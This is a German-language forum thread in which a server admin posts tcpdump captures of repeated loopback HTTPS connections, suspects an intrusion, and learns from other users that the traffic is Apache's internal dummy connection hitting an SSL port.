20:40:55.135583 IP laber-land.de.42967 > laber-land.de.https: S 1204101502:1204101502(0) win 32792 <mss 16396,sackOK,timestamp 63455524 0,nop,wscale 2>
20:40:55.135647 IP laber-land.de.https > laber-land.de.42967: S 1196825664:1196825664(0) ack 1204101503 win 32768 <mss 16396,sackOK,timestamp 63455524 63455524,nop,wscale 2>
20:40:55.136110 IP laber-land.de.42967 > laber-land.de.https: . ack 1 win 8198 <nop,nop,timestamp 63455524 63455524>
20:40:55.136510 IP laber-land.de.42967 > laber-land.de.https: P 1:67(66) ack 1 win 8198 <nop,nop,timestamp 63455524 63455524>
20:40:55.136587 IP laber-land.de.https > laber-land.de.42967: . ack 67 win 8192 <nop,nop,timestamp 63455524 63455524>
20:40:55.137018 IP laber-land.de.42967 > laber-land.de.https: F 67:67(0) ack 1 win 8198 <nop,nop,timestamp 63455524 63455524>
20:40:55.139361 IP laber-land.de.https > laber-land.de.42967: P 1:471(470) ack 68 win 8192 <nop,nop,timestamp 63455524 63455524>
20:40:55.139471 IP laber-land.de.42967 > laber-land.de.https: R 1204101570:1204101570(0) win 0
20:40:56.135591 IP laber-land.de.42968 > laber-land.de.https: S 1200170522:1200170522(0) win 32792 <mss 16396,sackOK,timestamp 63455774 0,nop,wscale 2>
20:40:56.135656 IP laber-land.de.https > laber-land.de.42968: S 1197798697:1197798697(0) ack 1200170523 win 32768 <mss 16396,sackOK,timestamp 63455774 63455774,nop,wscale 2>
20:40:56.136111 IP laber-land.de.42968 > laber-land.de.https: . ack 1 win 8198 <nop,nop,timestamp 63455774 63455774>
20:40:56.136511 IP laber-land.de.42968 > laber-land.de.https: P 1:67(66) ack 1 win 8198 <nop,nop,timestamp 63455774 63455774>
20:40:56.136592 IP laber-land.de.https > laber-land.de.42968: . ack 67 win 8192 <nop,nop,timestamp 63455774 63455774>
20:40:56.137013 IP laber-land.de.42968 > laber-land.de.https: F 67:67(0) ack 1 win 8198 <nop,nop,timestamp 63455774 63455774>
20:40:56.138256 IP laber-land.de.https > laber-land.de.42968: P 1:471(470) ack 68 win 8192 <nop,nop,timestamp 63455774 63455774>
20:40:56.138339 IP laber-land.de.42968 > laber-land.de.https: R 1200170590:1200170590(0) win 0
^[[C^[[D20:43:44.141076 IP laber-land.de.42969 > laber-land.de.https: S 1371009477:1371009477(0) win 32792 <mss 16396,sackOK,timestamp 63497775 0,nop,wscale 2>
20:43:44.141140 IP laber-land.de.https > laber-land.de.42969: S 1371648365:1371648365(0) ack 1371009478 win 32768 <mss 16396,sackOK,timestamp 63497775 63497775,nop,wscale 2>
20:43:44.141384 IP laber-land.de.42969 > laber-land.de.https: . ack 1 win 8198 <nop,nop,timestamp 63497775 63497775>
20:43:44.141577 IP laber-land.de.42969 > laber-land.de.https: P 1:67(66) ack 1 win 8198 <nop,nop,timestamp 63497775 63497775>
20:43:44.141644 IP laber-land.de.https > laber-land.de.42969: . ack 67 win 8192 <nop,nop,timestamp 63497775 63497775>
20:43:44.141867 IP laber-land.de.42969 > laber-land.de.https: F 67:67(0) ack 1 win 8198 <nop,nop,timestamp 63497775 63497775>
20:43:44.143368 IP laber-land.de.https > laber-land.de.42969: P 1:471(470) ack 68 win 8192 <nop,nop,timestamp 63497775 63497775>
20:43:44.143450 IP laber-land.de.42969 > laber-land.de.https: R 1371009545:1371009545(0) win 0
20:43:45.141052 IP laber-land.de.42970 > laber-land.de.https: S 1379139164:1379139164(0) win 32792 <mss 16396,sackOK,timestamp 63498025 0,nop,wscale 2>
20:43:45.141114 IP laber-land.de.https > laber-land.de.42970: S 1379412135:1379412135(0) ack 1379139165 win 32768 <mss 16396,sackOK,timestamp 63498025 63498025,nop,wscale 2>
20:43:45.141354 IP laber-land.de.42970 > laber-land.de.https: . ack 1 win 8198 <nop,nop,timestamp 63498025 63498025>
20:43:45.141538 IP laber-land.de.42970 > laber-land.de.https: P 1:67(66) ack 1 win 8198 <nop,nop,timestamp 63498025 63498025>
20:43:45.141609 IP laber-land.de.https > laber-land.de.42970: . ack 67 win 8192 <nop,nop,timestamp 63498025 63498025>
20:43:45.141823 IP laber-land.de.42970 > laber-land.de.https: F 67:67(0) ack 1 win 8198 <nop,nop,timestamp 63498025 63498025>
20:43:45.143280 IP laber-land.de.https > laber-land.de.42970: P 1:471(470) ack 68 win 8192 <nop,nop,timestamp 63498025 63498025>
20:43:45.143365 IP laber-land.de.42970 > laber-land.de.https: R 1379139232:1379139232(0) win 0
20:43:46.141060 IP laber-land.de.42971 > laber-land.de.https: S 1379055381:1379055381(0) win 32792 <mss 16396,sackOK,timestamp 63498275 0,nop,wscale 2>
20:43:46.141121 IP laber-land.de.https > laber-land.de.42971: S 1371596084:1371596084(0) ack 1379055382 win 32768 <mss 16396,sackOK,timestamp 63498275 63498275,nop,wscale 2>
20:43:46.141578 IP laber-land.de.42971 > laber-land.de.https: . ack 1 win 8198 <nop,nop,timestamp 63498275 63498275>
20:43:46.141980 IP laber-land.de.42971 > laber-land.de.https: P 1:67(66) ack 1 win 8198 <nop,nop,timestamp 63498275 63498275>
20:43:46.142063 IP laber-land.de.https > laber-land.de.42971: . ack 67 win 8192 <nop,nop,timestamp 63498275 63498275>
20:43:46.144359 IP laber-land.de.https > laber-land.de.42971: P 1:471(470) ack 67 win 8192 <nop,nop,timestamp 63498275 63498275>
20:43:46.144510 IP laber-land.de.https > laber-land.de.42971: F 471:471(0) ack 67 win 8192 <nop,nop,timestamp 63498275 63498275>
20:43:46.145263 IP laber-land.de.42971 > laber-land.de.https: . ack 471 win 8198 <nop,nop,timestamp 63498276 63498275>
20:43:46.145628 IP laber-land.de.42971 > laber-land.de.https: R 67:67(0) ack 472 win 8198 <nop,nop,timestamp 63498276 63498275>
20:43:56.149177 IP laber-land.de.42972 > laber-land.de.https: S 1391715398:1391715398(0) win 32792 <mss 16396,sackOK,timestamp 63500777 0,nop,wscale 2>
20:43:56.149243 IP laber-land.de.https > laber-land.de.42972: S 1392296252:1392296252(0) ack 1391715399 win 32768 <mss 16396,sackOK,timestamp 63500777 63500777,nop,wscale 2>
20:43:56.149751 IP laber-land.de.42972 > laber-land.de.https: . ack 1 win 8198 <nop,nop,timestamp 63500777 63500777>
20:43:56.150152 IP laber-land.de.42972 > laber-land.de.https: P 1:67(66) ack 1 win 8198 <nop,nop,timestamp 63500777 63500777>
20:43:56.150234 IP laber-land.de.https > laber-land.de.42972: . ack 67 win 8192 <nop,nop,timestamp 63500777 63500777>
20:43:56.151699 IP laber-land.de.https > laber-land.de.42972: P 1:471(470) ack 67 win 8192 <nop,nop,timestamp 63500777 63500777>
20:43:56.151792 IP laber-land.de.https > laber-land.de.42972: F 471:471(0) ack 67 win 8192 <nop,nop,timestamp 63500777 63500777>
20:43:56.152414 IP laber-land.de.42972 > laber-land.de.https: . ack 471 win 8198 <nop,nop,timestamp 63500777 63500777>
20:43:56.152755 IP laber-land.de.42972 > laber-land.de.https: R 67:67(0) ack 472 win 8198 <nop,nop,timestamp 63500777 63500777>
20:43:57.157152 IP laber-land.de.42973 > laber-land.de.https: S 1381547020:1381547020(0) win 32792 <mss 16396,sackOK,timestamp 63501029 0,nop,wscale 2>
20:43:57.157215 IP laber-land.de.https > laber-land.de.42973: S 1380267561:1380267561(0) ack 1381547021 win 32768 <mss 16396,sackOK,timestamp 63501029 63501029,nop,wscale 2>
20:43:57.157676 IP laber-land.de.42973 > laber-land.de.https: . ack 1 win 8198 <nop,nop,timestamp 63501029 63501029>
20:43:57.158076 IP laber-land.de.42973 > laber-land.de.https: P 1:67(66) ack 1 win 8198 <nop,nop,timestamp 63501029 63501029>
20:43:57.158158 IP laber-land.de.https > laber-land.de.42973: . ack 67 win 8192 <nop,nop,timestamp 63501029 63501029>
20:43:57.159199 IP laber-land.de.https > laber-land.de.42973: P 1:471(470) ack 67 win 8192 <nop,nop,timestamp 63501029 63501029>
20:43:57.159291 IP laber-land.de.https > laber-land.de.42973: F 471:471(0) ack 67 win 8192 <nop,nop,timestamp 63501029 63501029>
20:43:57.159881 IP laber-land.de.42973 > laber-land.de.https: . ack 471 win 8198 <nop,nop,timestamp 63501029 63501029>
20:43:57.160221 IP laber-land.de.42973 > laber-land.de.https: R 67:67(0) ack 472 win 8198 <nop,nop,timestamp 63501029 63501029>


Kann da irgendwer was mit anfangen? ;-)

Hi,

ich hatte auf einen kleineren :) dump mit -s0 und -X gehofft.Laufen bei dir irgendwelche
Proxies? Oder Verlinkungen von http nach https? Und schau doch mal nach dem Port
Range, mit netstat -natp.

Ah OK, hat wohl irgendwas mit https zu tun:


[root@laber-land pierre]# tcpdump -s0 -X -i lo
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on lo, link-type EN10MB (Ethernet), capture size 65535 bytes
21:04:06.631599 IP laber-land.de.52529 > laber-land.de.https: S 2656484577:2656484577(0) win 32792 <mss 16396,sackOK,timestamp 63803395 0,nop,wscale 2>
0x0000: 4500 003c 2ce2 4000 4006 0fd8 7f00 0001 E..<,.@.@.......
0x0010: 7f00 0001 cd31 01bb 9e56 bce1 0000 0000 .....1...V......
0x0020: a002 8018 d19c 0000 0204 400c 0402 080a ..........@.....
0x0030: 03cd 9003 0000 0000 0103 0302 ............
21:04:06.631665 IP laber-land.de.https > laber-land.de.52529: S 2664791350:2664791350(0) ack 2656484578 win 32768 <mss 16396,sackOK,timestamp 63803395 63803395,nop,wscale 2>
0x0000: 4500 003c 0000 4000 4006 3cba 7f00 0001 E..<..@.@.<.....
0x0010: 7f00 0001 01bb cd31 9ed5 7d36 9e56 bce2 .......1..}6.V..
0x0020: a012 8000 21c7 0000 0204 400c 0402 080a ....!.....@.....
0x0030: 03cd 9003 03cd 9003 0103 0302 ............
21:04:06.633049 IP laber-land.de.52529 > laber-land.de.https: . ack 1 win 8198 <nop,nop,timestamp 63803395 63803395>
0x0000: 4500 0034 2ce3 4000 4006 0fdf 7f00 0001 E..4,.@.@.......
0x0010: 7f00 0001 cd31 01bb 9e56 bce2 9ed5 7d37 .....1...V....}7
0x0020: 8010 2006 eae0 0000 0101 080a 03cd 9003 ................
0x0030: 03cd 9003 ....
21:04:06.633541 IP laber-land.de.52529 > laber-land.de.https: P 1:67(66) ack 1 win 8198 <nop,nop,timestamp 63803395 63803395>
0x0000: 4500 0076 2ce4 4000 4006 0f9c 7f00 0001 E..v,.@.@.......
0x0010: 7f00 0001 cd31 01bb 9e56 bce2 9ed5 7d37 .....1...V....}7
0x0020: 8018 2006 fe6a 0000 0101 080a 03cd 9003 .....j..........
0x0030: 03cd 9003 4745 5420 2f20 4854 5450 2f31 ....GET./.HTTP/1
0x0040: 2e30 0d0a 5573 6572 2d41 6765 6e74 3a20 .0..User-Agent:.
0x0050: 4170 6163 6865 2028 696e 7465 726e 616c Apache.(internal
0x0060: 2064 756d 6d79 2063 6f6e 6e65 6374 696f .dummy.connectio
0x0070: 6e29 0d0a 0d0a n)....
21:04:06.633620 IP laber-land.de.https > laber-land.de.52529: . ack 67 win 8192 <nop,nop,timestamp 63803395 63803395>
0x0000: 4500 0034 ed34 4000 4006 4f8d 7f00 0001 E..4.4@.@.O.....
0x0010: 7f00 0001 01bb cd31 9ed5 7d37 9e56 bd24 .......1..}7.V.$
0x0020: 8010 2000 eaa4 0000 0101 080a 03cd 9003 ................
0x0030: 03cd 9003 ....
21:04:06.635244 IP laber-land.de.https > laber-land.de.52529: P 1:471(470) ack 67 win 8192 <nop,nop,timestamp 63803395 63803395>
0x0000: 4500 020a ed35 4000 4006 4db6 7f00 0001 E....5@.@.M.....
0x0010: 7f00 0001 01bb cd31 9ed5 7d37 9e56 bd24 .......1..}7.V.$
0x0020: 8018 2000 fffe 0000 0101 080a 03cd 9003 ................
0x0030: 03cd 9003 3c21 444f 4354 5950 4520 4854 ....<!DOCTYPE.HT
0x0040: 4d4c 2050 5542 4c49 4320 222d 2f2f 4945 ML.PUBLIC."-//IE
0x0050: 5446 2f2f 4454 4420 4854 4d4c 2032 2e30 TF//DTD.HTML.2.0
0x0060: 2f2f 454e 223e 0a3c 6874 6d6c 3e3c 6865 //EN">.<html><he
0x0070: 6164 3e0a 3c74 6974 6c65 3e34 3030 2042 ad>.<title>400.B
0x0080: 6164 2052 6571 7565 7374 3c2f 7469 746c ad.Request</titl
0x0090: 653e 0a3c 2f68 6561 643e 3c62 6f64 793e e>.</head><body>
0x00a0: 0a3c 6831 3e42 6164 2052 6571 7565 7374 .<h1>Bad.Request
0x00b0: 3c2f 6831 3e0a 3c70 3e59 6f75 7220 6272 </h1>.<p>Your.br
0x00c0: 6f77 7365 7220 7365 6e74 2061 2072 6571 owser.sent.a.req
0x00d0: 7565 7374 2074 6861 7420 7468 6973 2073 uest.that.this.s
0x00e0: 6572 7665 7220 636f 756c 6420 6e6f 7420 erver.could.not.
0x00f0: 756e 6465 7273 7461 6e64 2e3c 6272 202f understand.<br./
0x0100: 3e0a 5265 6173 6f6e 3a20 596f 7527 7265 >.Reason:.You're
0x0110: 2073 7065 616b 696e 6720 706c 6169 6e20 .speaking.plain.
0x0120: 4854 5450 2074 6f20 616e 2053 534c 2d65 HTTP.to.an.SSL-e
0x0130: 6e61 626c 6564 2073 6572 7665 7220 706f nabled.server.po
0x0140: 7274 2e3c 6272 202f 3e0a 496e 7374 6561 rt.<br./>.Instea
0x0150: 6420 7573 6520 7468 6520 4854 5450 5320 d.use.the.HTTPS.
0x0160: 7363 6865 6d65 2074 6f20 6163 6365 7373 scheme.to.access
0x0170: 2074 6869 7320 5552 4c2c 2070 6c65 6173 .this.URL,.pleas
0x0180: 652e 3c62 7220 2f3e 0a3c 626c 6f63 6b71 e.<br./>.<blockq
0x0190: 756f 7465 3e48 696e 743a 203c 6120 6872 uote>Hint:.<a.hr
0x01a0: 6566 3d22 6874 7470 733a 2f2f 6164 6d69 ef="https://admi
0x01b0: 6e2e 6c61 6265 722d 6c61 6e64 2e64 652f n.laber-land.de/
0x01c0: 223e 3c62 3e68 7474 7073 3a2f 2f61 646d "><b>https://adm
0x01d0: 696e 2e6c 6162 6572 2d6c 616e 642e 6465 in.laber-land.de
0x01e0: 2f3c 2f62 3e3c 2f61 3e3c 2f62 6c6f 636b /</b></a></block
0x01f0: 7175 6f74 653e 3c2f 703e 0a3c 2f62 6f64 quote></p>.</bod
0x0200: 793e 3c2f 6874 6d6c 3e0a y></html>.
21:04:06.635335 IP laber-land.de.https > laber-land.de.52529: F 471:471(0) ack 67 win 8192 <nop,nop,timestamp 63803395 63803395>
0x0000: 4500 0034 ed36 4000 4006 4f8b 7f00 0001 E..4.6@.@.O.....
0x0010: 7f00 0001 01bb cd31 9ed5 7f0d 9e56 bd24 .......1.....V.$
0x0020: 8011 2000 e8cd 0000 0101 080a 03cd 9003 ................
0x0030: 03cd 9003 ....
21:04:06.636441 IP laber-land.de.52529 > laber-land.de.https: . ack 471 win 8198 <nop,nop,timestamp 63803396 63803395>
0x0000: 4500 0034 2ce5 4000 4006 0fdd 7f00 0001 E..4,.@.@.......
0x0010: 7f00 0001 cd31 01bb 9e56 bd24 9ed5 7f0d .....1...V.$....
0x0020: 8010 2006 e8c7 0000 0101 080a 03cd 9004 ................
0x0030: 03cd 9003 ....
21:04:06.636869 IP laber-land.de.52529 > laber-land.de.https: R 67:67(0) ack 472 win 8198 <nop,nop,timestamp 63803396 63803395>
0x0000: 4500 0034 2ce6 4000 4006 0fdc 7f00 0001 E..4,.@.@.......
0x0010: 7f00 0001 cd31 01bb 9e56 bd24 9ed5 7f0e .....1...V.$....
0x0020: 8014 2006 e8c2 0000 0101 080a 03cd 9004 ................
0x0030: 03cd 9003 ....


Interessant ist:


0x0050: 4170 6163 6865 2028 696e 7465 726e 616c Apache.(internal
0x0060: 2064 756d 6d79 2063 6f6e 6e65 6374 696f .dummy.connectio
0x0070: 6e29 0d0a 0d0a n)....

Scheinbar ist das kein Angriff und ich habe nur bei der SSL-Konfiguration irgendwie Mist gebaut :-)

Ja, das steht da in der Fehlermeldung :D

Gruss 403

wieder einer weniger paranoid :p

OK, liegt wohl daran, wenn ich sowas wie "REDIRECT / https://..." mache, nicht?

Naja, vielen Dank für die Hilfe; lieber einmal zu viel paranoid als zu wenig ;-)

Thema ist ja zum Glück fertig behandelt :)


Wie kommst Du denn auf eine installierte Remote-Shell?
Die Anfragen kamen ja von localhost somit vom Server selber. Wenn die Anfragen nicht von dir kommen sind, dann muss jemand anders sie erstellt haben.
Fast alle dieser HTTP-Requests hatten in der URL einen potentiellen Exploit. Wie ich auch geschrieben haben, fand ich es merkwürdig, dass jemand mit Access auf deinem Server die Exploits ausführt, wenn er eh schon Zugriff hat. Dennoch könnte es Menschen geben, die versuchen Exploits aufzuführen, obwohl sie schon Zugriff hatten.

Das ist die Erklärung im Ganzen.

Gruß

Übrigens: das scheint ein generelles "Problem" des Apache zu sein; der ruft sich wohl gerne mal selbst auf. Siehe u.a. http://www.fi.muni.cz/~kas/blog/index.cgi/computers/graceful-reload.html

http://www.linuxforen.de/forums/showthread.php?p=1637358#post1637358

Man "arbeitet" sich so langsam "nach vorne".

Gemeldet